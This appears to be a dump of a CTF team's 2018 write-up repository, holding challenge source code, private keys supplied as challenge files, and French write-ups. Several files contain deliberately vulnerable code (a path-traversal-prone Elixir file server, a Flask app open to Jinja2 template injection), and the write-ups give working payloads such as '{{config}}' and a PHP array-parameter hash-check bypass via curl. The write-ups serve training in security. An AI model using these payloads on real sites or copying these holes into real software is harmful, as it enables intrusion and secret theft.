???????????????????????????????????????????????????????????????? 19 | ???????????????????????????????????????????????????????????????? 20 | ???????????????????????????????????????????????????????????????? 21 | ???????????????????????????????????????????????????????????????? 22 | ???????????????????????????????????????????????????????????????? 23 | ???????????????????????????????????????????????????????????????? 24 | ???????????????????????????????????????????????????????????????? 25 | ???????????????????????????????????????????????????????????????? 26 | ???????????????????????????????????????????????????? 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /2018/angstrom/crypto/ssh/files/id_rsa.pub: -------------------------------------------------------------------------------- 1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+XZWLCbIpHPC9NlEckVXiKfiujcyu4VUslmm4G1MqNjtPNHaUEoZ8z5LLQK3e9SAKBdze8JyNowmC+lQT2VL059s9pzlRn6t31XTeUjZslgOs6IfAy/MsUkfOwUIo6KcqpSVnmeVMQPOiLUZCza9eDdB3MxFY59hNuodW1TGku00ro+ecKZcvJ+uNC/nfgeLpzaI7Dd6tI8AKrr+g9Tgyd6Ihd3KanLXuWMRwGbbLMi1/uaQd86LVYt/SAvkGO15eUELP723c/kEjKGfhwSKo3MGM5R77uMxfm8DzKW8QkcowEO2FEnPUykBnV1PaiWrl/PoBWTp8hNUYxQPAruWB 2 | -------------------------------------------------------------------------------- /2018/angstrom/crypto/ssh/files/privkey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAvl2ViwmyKRzwvTZRHJFV4in4ro3MruFVLJZpuBtTKjY7TzR2lBKGfM+Sy0Ct 3 | 3vUgCgXc3vCcjaMJgvpUE9lS9OfbPac5UZ+rd9V03lI2bJYDrOiHwMvzLFJHzsFCKOinKqUlZ5nl 4 | TEDzoi1GQs2vXg3QdzMRWOfYTbqHVtUxpLtNK6PnnCmXLyfrjQv534Hi6c2iOw3erSPACq6/oPU4 5 | MneiIXdympy17ljEcBm2yzItf7mkHfOi1WLf0gL5BjteXlBCz+9t3P5BIyhn4cEiqNzBjOUe+7jM 6 | X5vA8ylvEJHKMBDthRJz1MpAZ1dT2olq5fz6AVk6fITVGMUDwK7lgQIDAQABAoIBAGIAdbtFe5XU 7 | 007lhq5pV8h+CQt77rLdSGcS7EwerRrfHntxK9ahDuF0T0MaAij1EtB2IjYXstDr7TqjuuMZD68L 8 | KgA8dbLCu5iOqILH2kLem/fJIhIsLP1VQqh7L5813tGCgZYrUTOHgKWuHyzHDRAjln23KagWe3HQ 9 | pFocmVkPPEv6WfbLmYCNG4xOXAyn/u7H8siPbO4KNDvh8SF8I8LsDneXQDdM/9oxnch5egsBCliw 10 | rXnjOtw8oIjcv0/baNqVTEmzqmk/DgVF1oReNBPXIKLfXJgVjktF0r1uLqCGctsgZE6prsfBksEI 11 | e5cFZM2SnUPl6jLxweGaJmrbhO0CgYEA6YSwggFR1+1qhlaQc+oS5k02+jO8NgCCzR6HrQYY9t1v 12 | DbrGdBcMPRHx6OoSCMSO48YxP3cDE4/C0tyOlP3UpCe9kqQg3ooCXQQj6ANRrKoskr/l4RcpYC2/ 13 | ZTbmSZFL9t5Em+ic2ayw0nNUSI6XO7+3tcT9TABzh94t9YLhiDcCgYEA0LFZOUTgvmnWAkwGSo/6 14 | huQOu/7VmsM7OBdFntgotOJXALXFqCeT2PMXyWVc9/6ObUZjz9LQUlT6mnzYwFrX4mPPOTY5nvCy 15 | jepQlSDA7w49yaRhXKCFRHmEieeFJqzrZoQGyyhOvg7gEg3v50Bf/n12+2u0aRg8smKCLJtvNAcC 16 | gYEAs7m0P9rUKuRHgG1PcGdPdIEpNxhqWwW5pjVBJyHyRM3YkzCVXPQAL2CIV0MP7j+Z2iTH8pie 17 | fYe/4ppuAq354v3TIfHAeoatmvl8yS0Ex2eSNsALJVq2NZgAHt5KD4UMekxHcdduIPqQfOjWjaFx 18 | NEMyGWwrpzsRsBiINtUsz7ECgYAgYbRff4GD6jYryxIa1bZg4dgrcYJBblOtA2dpG09NqeUoFgxi 19 | aCm3uxiQxmqjjFsbN5XbNHHgpJDyEbcsOaxP037e+Lv+HokGHjp8uUVWkpYhyKDW1412L4jSQRtX 20 | AfPQx2GqekmlkfdQtdrovgNnIJ6qqm6m8/zPDRv3wfKCVwKBgBKGWd6+9MQbT6IwcNXAPqgrkVMN 21 | HIRvjizSAZ3uvJ1nS5iVodKdrFuKkay/8FkJNFSYAEFaalTU0OG0jM6fP2b8HLUwRJY3/iV0rtuP 22 | HAG6NCoc2LGRSsio4MBPIlAscIsU7IPegUWefFsRvJu7aIWZrIqiY1g6SOTW6yPOeSrc 23 | -----END RSA PRIVATE KEY----- 24 | -------------------------------------------------------------------------------- /2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/config/config.exs: -------------------------------------------------------------------------------- 1 | # This file is responsible for configuring your application 2 | # and its dependencies with the aid of the Mix.Config module. 3 | use Mix.Config 4 | 5 | # This configuration is loaded before any dependency and is restricted 6 | # to this project. If another project depends on this project, this 7 | # file won't be loaded nor affect the parent project. For this reason, 8 | # if you want to provide default values for your application for 9 | # 3rd-party users, it should be done in your "mix.exs" file. 10 | 11 | # You can configure your application as: 12 | # 13 | # config :pastepalooza, key: :value 14 | # 15 | # and access this configuration in your application as: 16 | # 17 | # Application.get_env(:pastepalooza, :key) 18 | # 19 | # You can also configure a 3rd-party app: 20 | # 21 | # config :logger, level: :info 22 | # 23 | 24 | # It is also possible to import configuration files, relative to this 25 | # directory. For example, you can emulate configuration per environment 26 | # by uncommenting the line below and defining dev.exs, test.exs and such. 27 | # Configuration from the imported file will override the ones defined 28 | # here (which is why it is important to import them last). 29 | # 30 | # import_config "#{Mix.env}.exs" 31 | -------------------------------------------------------------------------------- /2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/lib/pastepalooza.ex: -------------------------------------------------------------------------------- 1 | defmodule PastePalooza do 2 | require Logger 3 | 4 | def accept(port) do 5 | {:ok, socket} = :gen_tcp.listen(port, [:binary, packet: :line, active: false, reuseaddr: true]) 6 | Logger.info "Accepting connections on port #{port}" 7 | loop_acceptor(socket) 8 | end 9 | 10 | defp loop_acceptor(socket) do 11 | {:ok, client} = :gen_tcp.accept(socket) 12 | serve(client) 13 | loop_acceptor(socket) 14 | end 15 | 16 | defp serve(socket) do 17 | write_line(socket, "Welcome to Paste Palooza!\n") 18 | write_line(socket, "Currently, only the file access feature is available.\n") 19 | write_line(socket, "Access a file by entering its name: ") 20 | {:ok, filename} = read_line(socket) 21 | response = Utility.access(filename) 22 | write_line(socket, response) 23 | :gen_tcp.close(socket) 24 | end 25 | 26 | defp read_line(socket) do 27 | :gen_tcp.recv(socket, 0) 28 | end 29 | 30 | defp write_line(socket, text) do 31 | :gen_tcp.send(socket, text) 32 | end 33 | end 34 | -------------------------------------------------------------------------------- /2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/lib/server.ex: -------------------------------------------------------------------------------- 1 | defmodule Server do 2 | use Application 3 | 4 | def start(_type, _args) do 5 | children = [ 6 | {Task.Supervisor, name: PastePalooza.TaskSupervisor}, 7 | Supervisor.child_spec({Task, fn -> PastePalooza.accept(3001) end}, restart: :permanent) 8 | ] 9 | 10 | opts = [strategy: :one_for_one, name: PastePalooza.Supervisor] 11 | Supervisor.start_link(children, opts) 12 | end 13 | end 14 | -------------------------------------------------------------------------------- /2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/lib/utility.ex: -------------------------------------------------------------------------------- 1 | defmodule Utility do 2 | 3 | def access(filename) do 4 | unsafe = "pastes/" <> filename <> ".txt" 5 | path = filter(unsafe <> <<0>>, "", String.length(unsafe)) 6 | case File.read path do 7 | {:ok, content} -> content 8 | {:error, reason} -> "File not found.\n" 9 | end 10 | end 11 | 12 | def filter(<< head, tail :: binary >>, acc, n) do 13 | if n == 0 do 14 | acc 15 | else 16 | n = n - 1 17 | if head < 33 or head > 126 do 18 | filter(tail, acc, n) 19 | else 20 | filter(tail, acc <> <>, n) 21 | end 22 | end 23 | end 24 | end -------------------------------------------------------------------------------- /2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/mix.exs: -------------------------------------------------------------------------------- 1 | defmodule PastePalooza.Mixfile do 2 | use Mix.Project 3 | 4 | def project do 5 | [ 6 | app: :pastepalooza, 7 | version: "0.1.0", 8 | elixir: "~> 1.5", 9 | start_permanent: Mix.env == :prod, 10 | deps: deps(), 11 | flag: "REDACTED" 12 | ] 13 | end 14 | 15 | # Run "mix help compile.app" to learn about applications. 16 | def application do 17 | [ 18 | extra_applications: [:logger], 19 | mod: {Server, []} 20 | ] 21 | end 22 | 23 | # Run "mix help deps" to learn about dependencies. 24 | defp deps do 25 | [ 26 | # {:dep_from_hexpm, "~> 0.3.0"}, 27 | # {:dep_from_git, git: "https://github.com/elixir-lang/my_dep.git", tag: "0.1.0"}, 28 | ] 29 | end 30 | end 31 | -------------------------------------------------------------------------------- /2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/pastes/paste.txt: -------------------------------------------------------------------------------- 1 | paste palooza! -------------------------------------------------------------------------------- /2018/angstrom/web/madlibs/README.md: -------------------------------------------------------------------------------- 1 | # Angstrom - CTF writeup - MADLIBS - 120 pts 2 | 3 | - On se retrouve avec une page web dans laquelle on peut saisir des données en fonction d'un template. 4 | ![img/screen1.png](img/screen1.png) 5 | 6 | - On complète les données et on obtient nos données formatées dans un template. 7 | ![img/screen2.png](img/screen2.png) 8 | 9 | - Le code source de l'application est mis à disposition : [app.py](src/app.py) 10 | - On voit évidement ce qui nous interresse : 11 | ```python 12 | app.secret_key = open("flag.txt").read() 13 | ``` 14 | 15 | - On cherche du coté de template injection en envoyant du `{{2-1}}` dans chaque champs disponible. On obtient alors une interprétation dans le champ author : 16 | ![img/screen3.png](img/screen3.png) 17 | 18 | - Il s'agit donc de template injection le problème est la limitation du nombre de charactères : 19 | ```python 20 | authorName = inpValues.pop(0)[:12] 21 | ``` 22 | 23 | - Si l'on exclus les `{{}}` il ne nous reste que 8 chars pour effectuer notre injection. 24 | - Au final après quelques recherches sur l'injection de template on tombe sur cette source : https://nvisium.com/resources/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html 25 | 26 | - On passe donc `{{config}}` en valeur d'auteur et on obtient : 27 | ![img/screen4.png](img/screen4.png) 28 | 29 | - flag : `actf{wow_ur_a_jinja_ninja}` 30 | 31 | By team Beers4Flags 32 | 33 | ``` 34 | ________ 35 | | | 36 | | #BFF | 37 | |________| 38 | _.._,_|,_ 39 | ( | ) 40 | ]~,"-.-~~[ 41 | .=] Beers ([ 42 | | ]) 4 ([ 43 | '=]) Flags [ 44 | |:: ' | 45 | ~~----~~ 46 | ``` 47 | -------------------------------------------------------------------------------- /2018/angstrom/web/madlibs/img/screen1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/madlibs/img/screen1.png -------------------------------------------------------------------------------- /2018/angstrom/web/madlibs/img/screen2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/madlibs/img/screen2.png -------------------------------------------------------------------------------- /2018/angstrom/web/madlibs/img/screen3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/madlibs/img/screen3.png -------------------------------------------------------------------------------- /2018/angstrom/web/madlibs/img/screen4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/madlibs/img/screen4.png -------------------------------------------------------------------------------- /2018/angstrom/web/madlibs/src/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template, render_template_string, send_from_directory, request 2 | from jinja2 import Environment, FileSystemLoader 3 | from time import gmtime, strftime 4 | template_dir = './templates' 5 | env = Environment(loader=FileSystemLoader(template_dir)) 6 | 7 | 8 | madlib_names = ["The Tale of a Person","A Random Story"] 9 | story_fields = { 10 | "The Tale of a Person":['Author Name','Adjective','Noun','Verb'], 11 | "A Random Story":['Author Name','Adjective','Noun','Any first name','Verb'] 12 | } 13 | 14 | app = Flask(__name__) 15 | app.secret_key = open("flag.txt").read() 16 | 17 | @app.route("/",methods=["GET"]) 18 | def home(): 19 | return render_template("home.html",libs=madlib_names) 20 | 21 | @app.route("/form/",methods=["GET"]) 22 | def madlib(templatename): 23 | global madlib_names 24 | if templatename in madlib_names: 25 | return render_template("home.html",libs=madlib_names,title=templatename,fields=story_fields[templatename]) 26 | else: 27 | error_message = 'The MadLib with title "' + templatename + '" could not be found.' 28 | return render_template("home.html",libs=madlib_names,message=error_message) 29 | 30 | @app.route("/result/",methods=["POST"]) 31 | def output(templatename): 32 | 33 | if templatename not in madlib_names: 34 | return "Template not found." 35 | 36 | inpValues = [] 37 | for i in range(len(story_fields[templatename])): 38 | if not request.form[str(i+1)]: 39 | return "All form fields must be filled" 40 | else: 41 | inpValues.append(request.form[str(i+1)][:24]) 42 | 43 | authorName = inpValues.pop(0)[:12] 44 | try: 45 | comment = render_template_string('''This MadLib with title %s was created by %s at %s''' % (templatename, authorName, strftime("%Y-%m-%d %H:%M:%S", gmtime()))) 46 | except: 47 | comment = "Error generating comment." 48 | return render_template("_".join(templatename.lower().split())+".html",libtitle=templatename,footer=comment, libentries=inpValues) 49 | 50 | 51 | @app.route("/get-source", methods=["GET","POST"]) 52 | def source(): 53 | return send_from_directory('./','app.py') 54 | 55 | if __name__ == "__main__": 56 | app.run(host='0.0.0.0', port=7777, threaded=True) 57 | -------------------------------------------------------------------------------- /2018/angstrom/web/md5/readme.md: -------------------------------------------------------------------------------- 1 | # Angstrom - CTF writeup - MD5 - 140 pts 2 | 3 | - Le chall consiste en un formulaire qui doit comparer deux string qui une fois hashé en md5 doivent donner la même valeur : 4 | 5 | ![web-md5-screen.png](web-md5-screen.png) 6 | 7 | - On peut voir dans les sources le code php suivant : 8 | ```php 9 | 21 | ``` 22 | 23 | - On constate qu'il n'y a que des comparaisons strictes, en `===` ou `!==` 24 | - Le salt est le même des deux cotés : `hash("md5", $salt . $_GET["str1"]) === hash("md5", $salt . $_GET["str2"]))` 25 | - Il faut donc arriver à faire en sorte que str1 soit égal à str2 tout en bypassant le test : `$_GET["str1"] !== $_GET["str2"]` 26 | - Pour se faire on va utiliser les tableaux en php car un tableau concaténé à un string produit la chaine 'Array': 27 | ```php 28 | php > $a = array('str1'); 29 | php > $b = 'salt'.$a; 30 | PHP Notice: Array to string conversion in php shell code on line 1 31 | php > var_dump($b); 32 | string(9) "saltArray" 33 | ``` 34 | 35 | - Du coup en passant en paramètre deux tableaux différents, ceux-ci vont produire la même chaîne de caractère une fois concaténé au salt tout en passant le test d'inégalité des paramètres. 36 | 37 | - Résultat : `http://web.angstromctf.com:3003/?str1[]=a&str2[]=b` 38 | ``` 39 | ➜ ~ curl "http://web.angstromctf.com:3003/\?str1\[\]\=a\&str2\[\]\=b" 40 | actf{but_md5_has_charm} 41 | ``` 42 | 43 | By team Beers4Flags 44 | 45 | ``` 46 | ________ 47 | | | 48 | | #BFF | 49 | |________| 50 | _.._,_|,_ 51 | ( | ) 52 | ]~,"-.-~~[ 53 | .=] Beers ([ 54 | | ]) 4 ([ 55 | '=]) Flags [ 56 | |:: ' | 57 | ~~----~~ 58 | ``` 59 | -------------------------------------------------------------------------------- /2018/angstrom/web/md5/web-md5-screen.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/md5/web-md5-screen.png -------------------------------------------------------------------------------- /2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter01.png -------------------------------------------------------------------------------- /2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter02.png -------------------------------------------------------------------------------- /2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter03.png -------------------------------------------------------------------------------- /2018/bsides/forensic/fuzzy/files/img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/bsides/forensic/fuzzy/files/img.png -------------------------------------------------------------------------------- /2018/bsides/forensic/fuzzy/files/message.gpg: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP MESSAGE----- 2 | Version: OpenPGP v2.0.8 3 | Comment: https://sela.io/pgp/ 4 | 5 | wcBMA8fXP+32fyviAQf/T+NzsOgQ+ejW16GeK6h9WS9IDelAN9GLY5x5o9ilBlEL 6 | G4IPati4/zqd+kyV5mmA7k2eKnNByRnxElpp0PoGULX0ykjBTcXuLtNXzGWcDsFF 7 | xAkH8PduoPCcnNGWrCU6D8ZuWNtp7oeZ1krUZP+Kg9sfjjKfx0aUFhWs9SQH6mif 8 | AlbJQwxKi2xXv0UsHvg4Mz4TpVstoO5XcN9d4V+gygc+wx0K61JwAFw96xptNi9y 9 | hdMz/c7yW56JwBfwyiHvYmgLdWYJW9OEoQIj7Rwh1v8mD846vbvEDmagQ0Ra/K6q 10 | lnxa37gBFE+4kYpSXP7yqr8QMhmGDpMROJoJqxYyY9JxAe6317HZ+UUEOmNR+0tB 11 | EmPl/VVaoPc5q6RQ/cxwY4VhR4DtPsG9Gw237Sx+xSTAG5JbmtBf4KfQdVbeaXn1 12 | PYPYBeCVL6nb6uPz6ZHBJ2SODWg9+Ssas+Gd5P7Q0zSA/35qYdamnAqUM/ujM2nN 13 | k2U= 14 | =+x+V 15 | -----END PGP MESSAGE----- 16 | -------------------------------------------------------------------------------- /2018/bsides/forensic/fuzzy/files/private.gpg: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP PRIVATE KEY BLOCK----- 2 | Version: BCPG C# v1.6.1.0 3 | 4 | lQOsBFvO/9wBCACgT4fK4dJm+M14jotXPUeKueo8xfFDunNUx/ZaSQbp5Y0i64OZ 5 | dPkQk4E2zCgXaYKNRhiIx2RUy27GBf7xjtDb0gh/HNhC41f5ZzYrNQBEcabcr0hn 6 | VfwiEzAqmTg+5TNsG26ZD2kuO1/J5zbKxI1D3g/9//fe5Nw8GucDiOntKgvFEXeV 7 | ETZ0llbP/mh8SAn5+naJiJJri9y3GF+QhX7wYP+W6mBkano8X/Yk2B2qWIRT6wRU 8 | DMQy1ptavyv5EJhYbsQGeAMu7WPJN+mLutAE2E1Xj03Sevsx2ynN8b/jF/HYp/mZ 9 | SzZ+TbHlRUoMC4+hYh5XfXy7Cx9HSI0uIDShABEBAAH/AwMCEv0ZoXbeXxxg3ioH 10 | /Y0lUhYOormsNzbrBjl1ipyWTDmRAf9BhmAPrX9K5GPAFAurGOj8QOQEWGrOyXfk 11 | gYtHXzGk1K6ItCitgxdBqHgbti23Ht8SmVWw3/pijPXXerXXMqj6NQ95ma6bYPsU 12 | PRtE1qtiEs+T8ln6ZBU9BCNyuZDceBY6btZS0cp88wB1xEPorhXVtjiV1cjDRSFG 13 | licqXh4fr4Qe0TUEeZK1uTqlhdj6YvKoFP94OKGxeM0eR1R/H/zyOtJVMMsEZLGr 14 | GNSVBZBN0B6l9wAMa+DGpuHIX25I197vP3x0v0gvP/57bF9og9mj2JzntM9NJsR1 15 | 2zAgplgX4IUp4SGPvcNbLE5c9yIEj77SAOBumrF3IcUYNN9IXvIHQh8qzOWmI5q+ 16 | NFCKin0tQNCAx4ef+4ThkyPezRovlFxG6T4HMF1YjYrlVMgiN034opaCKoFXd3EF 17 | 4UufN3vV0IYB7AfxWLeNAJyPCreDSyYyLFGx+ONpM5JKk/1cwH8H0XQuLXY+TuGj 18 | iF6QWkRkVcAYv0F7r2wPaVOVa8465s34fY94Rv1+KCpsjNFc3FrAJhz84jETxxqr 19 | s44U/zmGh0/tixjs9vB1C/i7csYWXYJYiPsPmcp5sOE4M1PtYsIfuOlaJ12e/IV9 20 | YnNK+RLghYQ0MghUMHZeg8aqKY7SATDB1SuK+YKmhXte/E/VhTBUy+3RautMIUwS 21 | w9R1z2Hh4POZ4kp8yj9PnEujoQ5XtZuruhNyiWEwWYf1GPuDSoeEYcIRj18h8dL+ 22 | OSvsS1DqgPxH9hy8iidLDq1ZkrQ0w08Du9zjVY02f4OoRunzXbis6P3Y0mRf4iif 23 | bYdqVg3snMwY5u9lEaIYqmtcGibgybah394CgTt0xrQTa2FydGlrOTk3QGdtYWls 24 | LmNvbYkBHAQQAQIABgUCW87/3AAKCRDH1z/t9n8r4qnlB/9N1BBWSf6lfmejPh3R 25 | DZ+QrBsCELm8qBeawlsY9To6UUdrIoC9vzIwKAgil2K2MC9z/laZQcep0WepnOar 26 | 5KSUyhPI50/aE97yfA0v4lKkylb0OPt8E0S4gIxTlRhpht2K4lsRaD+2wyRvMRuU 27 | /Grgxd5TVVm9KfXQBCAxgFgX2OdZ2/Yb2GJQ4M6DquISIBar+i39a9bdZ9kP70ox 28 | jfgG8SLXPxzBiHIULUy4X+80VafKWw1/AzN2t4CTRtIMHu7jeUqpws+MB6TxTLBA 29 | G/JSdb+W3ceHseJ9YXqVIhfrlKt8T3QAqErjQjPN0YB9KDaELwDM1rxFryy8zuAB 30 | zdZ/ 31 | =rb5z 32 | -----END PGP PRIVATE KEY BLOCK----- 33 | -------------------------------------------------------------------------------- /2018/codegate/reverse/RedVelvet/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | title: CodegateCTF 4 | date: 3 Février 2018 5 | comments: true 6 | categories: wu 7 | auteur: jambon69 8 | --- 9 | 10 | ## RedVelvet 11 | 12 | Le binaire n'est pas strippé, donc le reverse de base est assez facile. 13 | 14 | On se retrouve face à 15 fonctions qui font des opérations sur les différents charactères du flag. 15 | Qui dit conditions dit z3, on ressort donc le bon vieil algorithm solver de Microsoft 16 | 17 | A la fin on a 4 flags qui satisfont les conditions, on les essaye tous. 18 | 19 | Le bon est finalement `What_You_Wanna_Be?:)_la_la` 20 | 21 | Bon ici j'ai utilisé un BitVec par charactère puisqu'on utilise des opérations bit à bit qui ne sont pas supportés par les Int de z3. C'est un peu crade, mais ça fait le boulot. 22 | -------------------------------------------------------------------------------- /2018/codegate/reverse/RedVelvet/RedVelvet: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/codegate/reverse/RedVelvet/RedVelvet -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # writeups 2 | 3 | Beers4Flags WU 4 | 5 | ### For members: 6 | 7 | File organization 8 | ``` 9 | CTFNAME-DATE 10 | -- categorie 11 | ---- challenge name 12 | ------README.md 13 | ------Others files 14 | ``` 15 | --------------------------------------------------------------------------------